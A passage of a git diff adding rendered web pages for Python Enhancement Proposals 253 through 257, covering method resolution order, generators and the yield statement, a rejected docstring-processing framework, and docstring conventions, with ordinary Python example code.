and while in the original diagram C.__getattr__() is invoked, +under the new system with the classic lookup rule, +object.__getattr__() would be invoked!

+

Fortunately, there’s a lookup rule that’s better. It’s a bit +difficult to explain, but it does the right thing in the diamond +diagram, and it is the same as the classic lookup rule when there +are no diamonds in the inheritance graph (when it is a tree).

+

The new lookup rule constructs a list of all classes in the +inheritance diagram in the order in which they will be searched. +This construction is done at class definition time to save time. +To explain the new lookup rule, let’s first consider what such a +list would look like for the classic lookup rule. Note that in +the presence of diamonds the classic lookup visits some classes +multiple times. For example, in the ABCD diamond diagram above, +the classic lookup rule visits the classes in this order:

+
D, B, A, C, A
+
+
+

Note how A occurs twice in the list. The second occurrence is +redundant, since anything that could be found there would already +have been found when searching the first occurrence.

+

We use this observation to explain our new lookup rule. Using the +classic lookup rule, construct the list of classes that would be +searched, including duplicates. Now for each class that occurs in +the list multiple times, remove all occurrences except for the +last. The resulting list contains each ancestor class exactly +once (including the most derived class, D in the example).

+

Searching for methods in this order will do the right thing for +the diamond diagram. Because of the way the list is constructed, +it does not change the search order in situations where no diamond +is involved.

+

Isn’t this backwards incompatible? Won’t it break existing code? +It would, if we changed the method resolution order for all +classes. However, in Python 2.2, the new lookup rule will only be +applied to types derived from built-in types, which is a new +feature. Class statements without a base class create “classic +classes”, and so do class statements whose base classes are +themselves classic classes. For classic classes the classic +lookup rule will be used. (To experiment with the new lookup rule +for classic classes, you will be able to specify a different +metaclass explicitly.) We’ll also provide a tool that analyzes a +class hierarchy looking for methods that would be affected by a +change in method resolution order.

+

XXX Another way to explain the motivation for the new MRO, due to +Damian Conway: you never use the method defined in a base class if +it is defined in a derived class that you haven’t explored yet +(using the old search order).

+
+
+

XXX To be done

+

Additional topics to be discussed in this PEP:

+
    +
  • backwards compatibility issues!!!
  • +
  • class methods and static methods
  • +
  • cooperative methods and super()
  • +
  • mapping between type object slots (tp_foo) and special methods +(__foo__) (actually, this may belong in PEP 252)
  • +
  • built-in names for built-in types (object, int, str, list etc.)
  • +
  • __dict__ and __dictoffset__
  • +
  • __slots__
  • +
  • the HEAPTYPE flag bit
  • +
  • GC support
  • +
  • API docs for all the new functions
  • +
  • how to use __new__
  • +
  • writing metaclasses (using mro() etc.)
  • +
  • high level user overview
  • +
+
+

open issues

+
    +
  • do we need __del__?
  • +
  • assignment to __dict__, __bases__
  • +
  • inconsistent naming +(e.g. tp_dealloc/tp_new/tp_init/tp_alloc/tp_free)
  • +
  • add builtin alias ‘dict’ for ‘dictionary’?
  • +
  • when subclasses of dict/list etc. are passed to system +functions, the __getitem__ overrides (etc.) aren’t always +used
  • +
+
+
+
+

Implementation

+

A prototype implementation of this PEP (and for PEP 252) is +available from CVS, and in the series of Python 2.2 alpha and beta +releases. For some examples of the features described here, see +the file Lib/test/test_descr.py and the extension module +Modules/xxsubtype.c.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0253.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0254/index.html b/pep-0254/index.html new file mode 100644 index 00000000000..03278a3be40 --- /dev/null +++ b/pep-0254/index.html @@ -0,0 +1,143 @@ + + + + + + + + PEP 254 – Making Classes Look More Like Types | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 254 – Making Classes Look More Like Types

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
18-Jun-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP has not been written yet. Watch this space!

+
+
+

Status

+

This PEP was a stub entry and eventually abandoned without having +been filled-out. Substantially most of the intended functionality +was implemented in Py2.2 with new-style types and classes.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0254.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0255/index.html b/pep-0255/index.html new file mode 100644 index 00000000000..f9ab2cb2959 --- /dev/null +++ b/pep-0255/index.html @@ -0,0 +1,630 @@ + + + + + + + + PEP 255 – Simple Generators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 255 – Simple Generators

+
+
Author:
+
Neil Schemenauer <nas at arctrix.com>, +Tim Peters <tim.peters at gmail.com>, +Magnus Lie Hetland <magnus at hetland.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Requires:
+
234
+
Created:
+
18-May-2001
+
Python-Version:
+
2.2
+
Post-History:
+
14-Jun-2001, 23-Jun-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces the concept of generators to Python, as well as a new +statement used in conjunction with them, the yield statement.

+
+
+

Motivation

+

When a producer function has a hard enough job that it requires maintaining +state between values produced, most programming languages offer no pleasant and +efficient solution beyond adding a callback function to the producer’s argument +list, to be called with each value produced.

+

For example, tokenize.py in the standard library takes this approach: the +caller must pass a tokeneater function to tokenize(), called whenever +tokenize() finds the next token. This allows tokenize to be coded in a +natural way, but programs calling tokenize are typically convoluted by the need +to remember between callbacks which token(s) were seen last. The tokeneater +function in tabnanny.py is a good example of that, maintaining a state +machine in global variables, to remember across callbacks what it has already +seen and what it hopes to see next. This was difficult to get working +correctly, and is still difficult for people to understand. Unfortunately, +that’s typical of this approach.

+

An alternative would have been for tokenize to produce an entire parse of the +Python program at once, in a large list. Then tokenize clients could be +written in a natural way, using local variables and local control flow (such as +loops and nested if statements) to keep track of their state. But this isn’t +practical: programs can be very large, so no a priori bound can be placed on +the memory needed to materialize the whole parse; and some tokenize clients +only want to see whether something specific appears early in the program (e.g., +a future statement, or, as is done in IDLE, just the first indented statement), +and then parsing the whole program first is a severe waste of time.

+

Another alternative would be to make tokenize an iterator, +delivering the +next token whenever its .next() method is invoked. This is pleasant for the +caller in the same way a large list of results would be, but without the memory +and “what if I want to get out early?” drawbacks. However, this shifts the +burden on tokenize to remember its state between .next() invocations, and +the reader need only glance at tokenize.tokenize_loop() to realize what a +horrid chore that would be. Or picture a recursive algorithm for producing the +nodes of a general tree structure: to cast that into an iterator framework +requires removing the recursion manually and maintaining the state of the +traversal by hand.

+

A fourth option is to run the producer and consumer in separate threads. This +allows both to maintain their states in natural ways, and so is pleasant for +both. Indeed, Demo/threads/Generator.py in the Python source distribution +provides a usable synchronized-communication class for doing that in a general +way. This doesn’t work on platforms without threads, though, and is very slow +on platforms that do (compared to what is achievable without threads).

+

A final option is to use the Stackless [1] (PEP 219) variant implementation of Python +instead, which supports lightweight coroutines. This has much the same +programmatic benefits as the thread option, but is much more efficient. +However, Stackless is a controversial rethinking of the Python core, and it may +not be possible for Jython to implement the same semantics. This PEP isn’t the +place to debate that, so suffice it to say here that generators provide a +useful subset of Stackless functionality in a way that fits easily into the +current CPython implementation, and is believed to be relatively +straightforward for other Python implementations.

+

That exhausts the current alternatives. Some other high-level languages +provide pleasant solutions, notably iterators in Sather [2], which were +inspired by iterators in CLU; and generators in Icon [3], a novel language +where every expression is a generator. There are differences among these, +but the basic idea is the same: provide a kind of function that can return an +intermediate result (“the next value”) to its caller, but maintaining the +function’s local state so that the function can be resumed again right where it +left off. A very simple example:

+
def fib():
+    a, b = 0, 1
+    while 1:
+       yield b
+       a, b = b, a+b
+
+
+

When fib() is first invoked, it sets a to 0 and b to 1, then yields b +back to its caller. The caller sees 1. When fib is resumed, from its +point of view the yield statement is really the same as, say, a print +statement: fib continues after the yield with all local state intact. a +and b then become 1 and 1, and fib loops back to the yield, yielding +1 to its invoker. And so on. From fib’s point of view it’s just +delivering a sequence of results, as if via callback. But from its caller’s +point of view, the fib invocation is an iterable object that can be resumed +at will. As in the thread approach, this allows both sides to be coded in the +most natural ways; but unlike the thread approach, this can be done efficiently +and on all platforms. Indeed, resuming a generator should be no more expensive +than a function call.

+

The same kind of approach applies to many producer/consumer functions. For +example, tokenize.py could yield the next token instead of invoking a +callback function with it as argument, and tokenize clients could iterate over +the tokens in a natural way: a Python generator is a kind of Python +iterator, but of an especially powerful kind.

+
+
+

Specification: Yield

+

A new statement is introduced:

+
yield_stmt:    "yield" expression_list
+
+
+

yield is a new keyword, so a future statement (PEP 236) is needed to phase +this in: in the initial release, a module desiring to use generators must +include the line:

+
from __future__ import generators
+
+
+

near the top (see PEP 236) for details). Modules using the identifier +yield without a future statement will trigger warnings. In the +following release, yield will be a language keyword and the future +statement will no longer be needed.

+

The yield statement may only be used inside functions. A function that +contains a yield statement is called a generator function. A generator +function is an ordinary function object in all respects, but has the new +CO_GENERATOR flag set in the code object’s co_flags member.

+

When a generator function is called, the actual arguments are bound to +function-local formal argument names in the usual way, but no code in the body +of the function is executed. Instead a generator-iterator object is returned; +this conforms to the iterator protocol, so in particular can be used in +for-loops in a natural way. Note that when the intent is clear from context, +the unqualified name “generator” may be used to refer either to a +generator-function or a generator-iterator.

+

Each time the .next() method of a generator-iterator is invoked, the code +in the body of the generator-function is executed until a yield or +return statement (see below) is encountered, or until the end of the body +is reached.

+

If a yield statement is encountered, the state of the function is frozen, +and the value of expression_list is returned to .next()’s caller. By +“frozen” we mean that all local state is retained, including the current +bindings of local variables, the instruction pointer, and the internal +evaluation stack: enough information is saved so that the next time +.next() is invoked, the function can proceed exactly as if the yield +statement were just another external call.

+

Restriction: A yield statement is not allowed in the try clause of a +try/finally construct. The difficulty is that there’s no guarantee the +generator will ever be resumed, hence no guarantee that the finally block will +ever get executed; that’s too much a violation of finally’s purpose to bear.

+

Restriction: A generator cannot be resumed while it is actively running:

+
>>> def g():
+...     i = me.next()
+...     yield i
+>>> me = g()
+>>> me.next()
+Traceback (most recent call last):
+ ...
+ File "<string>", line 2, in g
+ValueError: generator already executing
+
+
+
+
+

Specification: Return

+

A generator function can also contain return statements of the form:

+
return
+
+
+

Note that an expression_list is not allowed on return statements in the body +of a generator (although, of course, they may appear in the bodies of +non-generator functions nested within the generator).

+

When a return statement is encountered, control proceeds as in any function +return, executing the appropriate finally clauses (if any exist). Then a +StopIteration exception is raised, signalling that the iterator is +exhausted. A StopIteration exception is also raised if control flows off +the end of the generator without an explicit return.

+

Note that return means “I’m done, and have nothing interesting to return”, for +both generator functions and non-generator functions.

+

Note that return isn’t always equivalent to raising StopIteration: the +difference lies in how enclosing try/except constructs are treated. For +example,:

+
>>> def f1():
+...     try:
+...         return
+...     except:
+...        yield 1
+>>> print list(f1())
+[]
+
+
+

because, as in any function, return simply exits, but:

+
>>> def f2():
+...     try:
+...         raise StopIteration
+...     except:
+...         yield 42
+>>> print list(f2())
+[42]
+
+
+

because StopIteration is captured by a bare except, as is any +exception.

+
+
+

Specification: Generators and Exception Propagation

+

If an unhandled exception– including, but not limited to, StopIteration +–is raised by, or passes through, a generator function, then the exception is +passed on to the caller in the usual way, and subsequent attempts to resume the +generator function raise StopIteration. In other words, an unhandled +exception terminates a generator’s useful life.

+

Example (not idiomatic but to illustrate the point):

+
>>> def f():
+...     return 1/0
+>>> def g():
+...     yield f()  # the zero division exception propagates
+...     yield 42   # and we'll never get here
+>>> k = g()
+>>> k.next()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+  File "<stdin>", line 2, in g
+  File "<stdin>", line 2, in f
+ZeroDivisionError: integer division or modulo by zero
+>>> k.next()  # and the generator cannot be resumed
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+StopIteration
+>>>
+
+
+
+
+

Specification: Try/Except/Finally

+

As noted earlier, yield is not allowed in the try clause of a +try/finally construct. A consequence is that generators should allocate +critical resources with great care. There is no restriction on yield +otherwise appearing in finally clauses, except clauses, or in the +try clause of a try/except construct:

+
>>> def f():
+...     try:
+...         yield 1
+...         try:
+...             yield 2
+...             1/0
+...             yield 3  # never get here
+...         except ZeroDivisionError:
+...             yield 4
+...             yield 5
+...             raise
+...         except:
+...             yield 6
+...         yield 7     # the "raise" above stops this
+...     except:
+...         yield 8
+...     yield 9
+...     try:
+...         x = 12
+...     finally:
+...        yield 10
+...     yield 11
+>>> print list(f())
+[1, 2, 4, 5, 8, 9, 10, 11]
+>>>
+
+
+
+
+

Example

+
# A binary tree class.
+class Tree:
+
+    def __init__(self, label, left=None, right=None):
+        self.label = label
+        self.left = left
+        self.right = right
+
+    def __repr__(self, level=0, indent="    "):
+        s = level*indent + `self.label`
+        if self.left:
+            s = s + "\n" + self.left.__repr__(level+1, indent)
+        if self.right:
+            s = s + "\n" + self.right.__repr__(level+1, indent)
+        return s
+
+    def __iter__(self):
+        return inorder(self)
+
+# Create a Tree from a list.
+def tree(list):
+    n = len(list)
+    if n == 0:
+        return []
+    i = n / 2
+    return Tree(list[i], tree(list[:i]), tree(list[i+1:]))
+
+# A recursive generator that generates Tree labels in in-order.
+def inorder(t):
+    if t:
+        for x in inorder(t.left):
+            yield x
+        yield t.label
+        for x in inorder(t.right):
+            yield x
+
+# Show it off: create a tree.
+t = tree("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
+# Print the nodes of the tree in in-order.
+for x in t:
+    print x,
+print
+
+# A non-recursive generator.
+def inorder(node):
+    stack = []
+    while node:
+        while node.left:
+            stack.append(node)
+            node = node.left
+        yield node.label
+        while not node.right:
+            try:
+                node = stack.pop()
+            except IndexError:
+                return
+            yield node.label
+        node = node.right
+
+# Exercise the non-recursive generator.
+for x in t:
+    print x,
+print
+
+
+

Both output blocks display:

+
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
+
+
+
+
+

Q & A

+
+

Why not a new keyword instead of reusing def?

+

See BDFL Pronouncements section below.

+
+
+

Why a new keyword for yield? Why not a builtin function instead?

+

Control flow is much better expressed via keyword in Python, and yield is a +control construct. It’s also believed that efficient implementation in Jython +requires that the compiler be able to determine potential suspension points at +compile-time, and a new keyword makes that easy. The CPython reference +implementation also exploits it heavily, to detect which functions are +generator-functions (although a new keyword in place of def would solve +that for CPython – but people asking the “why a new keyword?” question don’t +want any new keyword).

+
+
+

Then why not some other special syntax without a new keyword?

+

For example, one of these instead of yield 3:

+
return 3 and continue
+return and continue 3
+return generating 3
+continue return 3
+return >> , 3
+from generator return 3
+return >> 3
+return << 3
+>> 3
+<< 3
+* 3
+
+
+

Did I miss one <wink>? Out of hundreds of messages, I counted three +suggesting such an alternative, and extracted the above from them. It would be +nice not to need a new keyword, but nicer to make yield very clear – I +don’t want to have to deduce that a yield is occurring from making sense of a +previously senseless sequence of keywords or operators. Still, if this +attracts enough interest, proponents should settle on a single consensus +suggestion, and Guido will Pronounce on it.

+
+
+

Why allow return at all? Why not force termination to be spelled raise StopIteration?

+

The mechanics of StopIteration are low-level details, much like the +mechanics of IndexError in Python 2.1: the implementation needs to do +something well-defined under the covers, and Python exposes these mechanisms +for advanced users. That’s not an argument for forcing everyone to work at +that level, though. return means “I’m done” in any kind of function, and +that’s easy to explain and to use. Note that return isn’t always equivalent +to raise StopIteration in try/except construct, either (see the +“Specification: Return” section).

+
+
+

Then why not allow an expression on return too?

+

Perhaps we will someday. In Icon, return expr means both “I’m done”, and +“but I have one final useful value to return too, and this is it”. At the +start, and in the absence of compelling uses for return expr, it’s simply +cleaner to use yield exclusively for delivering values.

+
+
+
+

BDFL Pronouncements

+
+

Issue

+

Introduce another new keyword (say, gen or generator) in place +of def, or otherwise alter the syntax, to distinguish generator-functions +from non-generator functions.

+
+
+

Con

+

In practice (how you think about them), generators are functions, but +with the twist that they’re resumable. The mechanics of how they’re set up +is a comparatively minor technical issue, and introducing a new keyword would +unhelpfully overemphasize the mechanics of how generators get started (a vital +but tiny part of a generator’s life).

+
+
+

Pro

+

In reality (how you think about them), generator-functions are actually +factory functions that produce generator-iterators as if by magic. In this +respect they’re radically different from non-generator functions, acting more +like a constructor than a function, so reusing def is at best confusing. +A yield statement buried in the body is not enough warning that the +semantics are so different.

+
+
+

BDFL

+

def it stays. No argument on either side is totally convincing, so I +have consulted my language designer’s intuition. It tells me that the syntax +proposed in the PEP is exactly right - not too hot, not too cold. But, like +the Oracle at Delphi in Greek mythology, it doesn’t tell me why, so I don’t +have a rebuttal for the arguments against the PEP syntax. The best I can come +up with (apart from agreeing with the rebuttals … already made) is “FUD”. +If this had been part of the language from day one, I very much doubt it would +have made Andrew Kuchling’s “Python Warts” page.

+
+
+
+

Reference Implementation

+

The current implementation, in a preliminary state (no docs, but well tested +and solid), is part of Python’s CVS development tree [5]. Using this requires +that you build Python from source.

+

This was derived from an earlier patch by Neil Schemenauer [4].

+
+
+

Footnotes and References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0255.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0256/index.html b/pep-0256/index.html new file mode 100644 index 00000000000..4bfafc00d23 --- /dev/null +++ b/pep-0256/index.html @@ -0,0 +1,334 @@ + + + + + + + + PEP 256 – Docstring Processing System Framework | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 256 – Docstring Processing System Framework

+
+
Author:
+
David Goodger <goodger at python.org>
+
Discussions-To:
+
Doc-SIG list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
01-Jun-2001
+
Post-History:
+
13-Jun-2001
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This proposal seems to have run out of steam.

+
+
+

Abstract

+

Python lends itself to inline documentation. With its built-in +docstring syntax, a limited form of Literate Programming is easy to +do in Python. However, there are no satisfactory standard tools for +extracting and processing Python docstrings. The lack of a standard +toolset is a significant gap in Python’s infrastructure; this PEP aims +to fill the gap.

+

The issues surrounding docstring processing have been contentious and +difficult to resolve. This PEP proposes a generic Docstring +Processing System (DPS) framework, which separates out the components +(program and conceptual), enabling the resolution of individual issues +either through consensus (one solution) or through divergence (many). +It promotes standard interfaces which will allow a variety of plug-in +components (input context readers, markup parsers, and output format +writers) to be used.

+

The concepts of a DPS framework are presented independently of +implementation details.

+
+
+

Road Map to the Docstring PEPs

+

There are many aspects to docstring processing. The “Docstring PEPs” +have broken up the issues in order to deal with each of them in +isolation, or as close as possible. The individual aspects and +associated PEPs are as follows:

+
    +
  • Docstring syntax. PEP 287, “reStructuredText Docstring Format”, +proposes a syntax for Python docstrings, PEPs, and +other uses.
  • +
  • Docstring semantics consist of at least two aspects:
      +
    • Conventions: the high-level structure of docstrings. Dealt with +in PEP 257, “Docstring Conventions”.
    • +
    • Methodology: rules for the informational content of docstrings. +Not addressed.
    • +
    +
  • +
  • Processing mechanisms. This PEP (PEP 256) outlines the high-level +issues and specification of an abstract docstring processing system +(DPS). PEP 258, “Docutils Design Specification”, is an +overview of the design and implementation of one DPS under +development.
  • +
  • Output styles: developers want the documentation generated from +their source code to look good, and there are many different ideas +about what that means. PEP 258 touches on “Stylist Transforms”. +This aspect of docstring processing has yet to be fully explored.
  • +
+

By separating out the issues, we can form consensus more easily +(smaller fights ;-), and accept divergence more readily.

+
+
+

Rationale

+

There are standard inline documentation systems for some other +languages. For example, Perl has POD (“Plain Old Documentation”) and +Java has Javadoc, but neither of these mesh with the Pythonic way. +POD syntax is very explicit, but takes after Perl in terms of +readability. Javadoc is HTML-centric; except for “@field” tags, +raw HTML is used for markup. There are also general tools such as +Autoduck and Web (Tangle & Weave), useful for multiple languages.

+

There have been many attempts to write auto-documentation systems +for Python (not an exhaustive list):

+
    +
  • Marc-Andre Lemburg’s doc.py
  • +
  • Daniel Larsson’s pythondoc & gendoc
  • +
  • Doug Hellmann’s HappyDoc
  • +
  • Laurence Tratt’s Crystal (no longer available on the web)
  • +
  • Ka-Ping Yee’s pydoc (pydoc.py is now part of the Python standard +library; see below)
  • +
  • Tony Ibbs’ docutils (Tony has donated this name to the Docutils +project)
  • +
  • Edward Loper’s STminus formalization and related efforts
  • +
+

These systems, each with different goals, have had varying degrees of +success. A problem with many of the above systems was over-ambition +combined with inflexibility. They provided a self-contained set of +components: a docstring extraction system, a markup parser, an +internal processing system and one or more output format writers with +a fixed style. Inevitably, one or more aspects of each system had +serious shortcomings, and they were not easily extended or modified, +preventing them from being adopted as standard tools.

+

It has become clear (to this author, at least) that the “all or +nothing” approach cannot succeed, since no monolithic self-contained +system could possibly be agreed upon by all interested parties. A +modular component approach designed for extension, where components +may be multiply implemented, may be the only chance for success. +Standard inter-component APIs will make the DPS components +comprehensible without requiring detailed knowledge of the whole, +lowering the barrier for contributions, and ultimately resulting in a +rich and varied system.

+

Each of the components of a docstring processing system should be +developed independently. A “best of breed” system should be chosen, +either merged from existing systems, and/or developed anew. This +system should be included in Python’s standard library.

+
+

PyDoc & Other Existing Systems

+

PyDoc became part of the Python standard library as of release 2.1. +It extracts and displays docstrings from within the Python interactive +interpreter, from the shell command line, and from a GUI window into a +web browser (HTML). Although a very useful tool, PyDoc has several +deficiencies, including:

+
    +
  • In the case of the GUI/HTML, except for some heuristic hyperlinking +of identifier names, no formatting of the docstrings is done. They +are presented within <p><small><tt> tags to avoid unwanted line +wrapping. Unfortunately, the result is not attractive.
  • +
  • PyDoc extracts docstrings and structural information (class +identifiers, method signatures, etc.) from imported module objects. +There are security issues involved with importing untrusted code. +Also, information from the source is lost when importing, such as +comments, “additional docstrings” (string literals in non-docstring +contexts; see PEP 258), and the order of definitions.
  • +
+

The functionality proposed in this PEP could be added to or used by +PyDoc when serving HTML pages. The proposed docstring processing +system’s functionality is much more than PyDoc needs in its current +form. Either an independent tool will be developed (which PyDoc may +or may not use), or PyDoc could be expanded to encompass this +functionality and become the docstring processing system (or one +such system). That decision is beyond the scope of this PEP.

+

Similarly for other existing docstring processing systems, their +authors may or may not choose compatibility with this framework. +However, if this framework is accepted and adopted as the Python +standard, compatibility will become an important consideration in +these systems’ future.

+
+
+
+

Specification

+

The docstring processing system framework is broken up as follows:

+
    +
  1. Docstring conventions. Documents issues such as:
      +
    • What should be documented where.
    • +
    • First line is a one-line synopsis.
    • +
    +

    PEP 257 documents some of these issues.

    +
  2. +
  3. Docstring processing system design specification. Documents +issues such as:
      +
    • High-level spec: what a DPS does.
    • +
    • Command-line interface for executable script.
    • +
    • System Python API.
    • +
    • Docstring extraction rules.
    • +
    • Readers, which encapsulate the input context.
    • +
    • Parsers.
    • +
    • Document tree: the intermediate internal data structure. The +output of the Parser and Reader, and the input to the Writer all +share the same data structure.
    • +
    • Transforms, which modify the document tree.
    • +
    • Writers for output formats.
    • +
    • Distributors, which handle output management (one file, many +files, or objects in memory).
    • +
    +

    These issues are applicable to any docstring processing system +implementation. PEP 258 documents these issues.

    +
  4. +
  5. Docstring processing system implementation.
  6. +
  7. Input markup specifications: docstring syntax. PEP 287 +proposes a standard syntax.
  8. +
  9. Input parser implementations.
  10. +
  11. Input context readers (“modes”: Python source code, PEP, standalone +text file, email, etc.) and implementations.
  12. +
  13. Stylists: certain input context readers may have associated +stylists which allow for a variety of output document styles.
  14. +
  15. Output formats (HTML, XML, TeX, DocBook, info, etc.) and writer +implementations.
  16. +
+

Components 1, 2/3/5, and 4 are the subject of individual companion +PEPs. If there is another implementation of the framework or +syntax/parser, additional PEPs may be required. Multiple +implementations of each of components 6 and 7 will be required; the +PEP mechanism may be overkill for these components.

+
+
+

Project Web Site

+

A SourceForge project has been set up for this work at +http://docutils.sourceforge.net/.

+
+ +
+

Acknowledgements

+

This document borrows ideas from the archives of the Python +Doc-SIG. Thanks to all members past & present.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0256.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0257/index.html b/pep-0257/index.html new file mode 100644 index 00000000000..8b04e3fed25 --- /dev/null +++ b/pep-0257/index.html @@ -0,0 +1,388 @@ + + + + + + + + PEP 257 – Docstring Conventions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 257 – Docstring Conventions

+
+
Author:
+
David Goodger <goodger at python.org>, +Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Doc-SIG list
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
29-May-2001
+
Post-History:
+
13-Jun-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP documents the semantics and conventions associated with +Python docstrings.

+
+
+

Rationale

+

The aim of this PEP is to standardize the high-level structure of +docstrings: what they should contain, and how to say it (without +touching on any markup syntax within docstrings). The PEP contains +conventions, not laws or syntax.

+
+
“A universal convention supplies all of maintainability, clarity, +consistency, and a foundation for good programming habits too. +What it doesn’t do is insist that you follow it against your will. +That’s Python!”

—Tim Peters on comp.lang.python, 2001-06-16

+
+

If you violate these conventions, the worst you’ll get is some dirty +looks. But some software (such as the Docutils docstring processing +system PEP 256, PEP 258) will be aware of the conventions, so following them +will get you the best results.

+
+
+

Specification

+
+

What is a Docstring?

+

A docstring is a string literal that occurs as the first statement in +a module, function, class, or method definition. Such a docstring +becomes the __doc__ special attribute of that object.

+

All modules should normally have docstrings, and all functions and +classes exported by a module should also have docstrings. Public +methods (including the __init__ constructor) should also have +docstrings. A package may be documented in the module docstring of +the __init__.py file in the package directory.

+

String literals occurring elsewhere in Python code may also act as +documentation. They are not recognized by the Python bytecode +compiler and are not accessible as runtime object attributes (i.e. not +assigned to __doc__), but two types of extra docstrings may be +extracted by software tools:

+
    +
  1. String literals occurring immediately after a simple assignment at +the top level of a module, class, or __init__ method are called +“attribute docstrings”.
  2. +
  3. String literals occurring immediately after another docstring are +called “additional docstrings”.
  4. +
+

Please see PEP 258, “Docutils Design Specification”, for a +detailed description of attribute and additional docstrings.

+

For consistency, always use """triple double quotes""" around +docstrings. Use r"""raw triple double quotes""" if you use any +backslashes in your docstrings.

+

There are two forms of docstrings: one-liners and multi-line +docstrings.

+
+
+

One-line Docstrings

+

One-liners are for really obvious cases. They should really fit on +one line. For example:

+
def kos_root():
+    """Return the pathname of the KOS root directory."""
+    global _kos_root
+    if _kos_root: return _kos_root
+    ...
+
+
+

Notes:

+
    +
  • Triple quotes are used even though the string fits on one line. +This makes it easy to later expand it.
  • +
  • The closing quotes are on the same line as the opening quotes. This +looks better for one-liners.
  • +
  • There’s no blank line either before or after the docstring.
  • +
  • The docstring is a phrase ending in a period. It prescribes the +function or method’s effect as a command (“Do this”, “Return that”), +not as a description; e.g. don’t write “Returns the pathname …”.
  • +
  • The one-line docstring should NOT be a “signature” reiterating the +function/method parameters (which can be obtained by introspection). +Don’t do:
    def function(a, b):
    +    """function(a, b) -> list"""
    +
    +
    +

    This type of docstring is only appropriate for C functions (such as +built-ins), where introspection is not possible. However, the +nature of the return value cannot be determined by introspection, +so it should be mentioned. The preferred form for such a docstring +would be something like:

    +
    def function(a, b):
    +    """Do X and return a list."""
    +
    +
    +

    (Of course “Do X” should be replaced by a useful description!)

    +
  • +
+
+
+

Multi-line Docstrings

+

Multi-line docstrings consist of a summary line just like a one-line +docstring, followed by a blank line, followed by a more elaborate +description. The summary line may be used by automatic indexing +tools; it is important that it fits on one line and is separated from +the rest of the docstring by a blank line. The summary line may be on +the same line as the opening quotes or on the next line. The entire +docstring is indented the same as the quotes at its first line (see +example below).

+

Insert a blank line after all docstrings (one-line or multi-line) that +document a class – generally speaking, the class’s methods are +separated from each other by a single blank line, and the docstring +needs to be offset from the first method by a blank line.

+

The docstring of a script (a stand-alone program) should be usable as +its “usage” message, printed when the script is invoked with incorrect +or missing arguments (or perhaps with a “-h” option, for “help”). +Such a docstring should document the script’s function and command +line syntax, environment variables, and files. Usage messages can be +fairly elaborate (several screens full) and should be sufficient for a +new user to use the command properly, as well as a complete quick +reference to all options and arguments for the sophisticated user.

+

The docstring for a module should generally list the classes, +exceptions and functions (and any other objects) that are exported by +the module, with a one-line summary of each. (These summaries +generally give less detail than the summary line in the object’s +docstring.) The docstring for a package (i.e., the docstring of the +package’s __init__.py module) should also list the modules and +subpackages exported by the package.

+

The docstring for a function or method should summarize its behavior +and document its arguments, return value(s), side effects, exceptions +raised, and restrictions on when it can be called (all if applicable). +Optional arguments should be indicated. It should be documented +whether keyword arguments are part of the interface.

+

The docstring for a class should summarize its behavior and list the +public methods and instance variables. If the class is intended to be +subclassed, and has an additional interface for subclasses, this +interface should be listed separately (in the docstring). The class +constructor should be documented in the docstring for its __init__ +method. Individual methods should be documented by their own +docstring.

+

If a class subclasses another class and its behavior is mostly +inherited from that class, its docstring should mention this and +summarize the differences. Use the verb “override” to indicate that a +subclass method replaces a superclass method and does not call the +superclass method; use the verb “extend” to indicate that a subclass +method calls the superclass method (in addition to its own behavior).

+

Do not use the Emacs convention of mentioning the arguments of +functions or methods in upper case in running text. Python is case +sensitive and the argument names can be used for keyword arguments, so +the docstring should document the correct argument names. It is best +to list each argument on a separate line. For example:

+
def complex(real=0.0, imag=0.0):
+    """Form a complex number.
+
+    Keyword arguments:
+    real -- the real part (default 0.0)
+    imag -- the imaginary part (default 0.0)
+    """
+    if imag == 0.0 and real == 0.0:
+        return complex_zero
+    ...
+
+
+

Unless the entire docstring fits on a line, place the closing quotes +on a line by themselves. This way, Emacs’ fill-paragraph command +can be used on it.

+
+
+

Handling Docstring Indentation

+

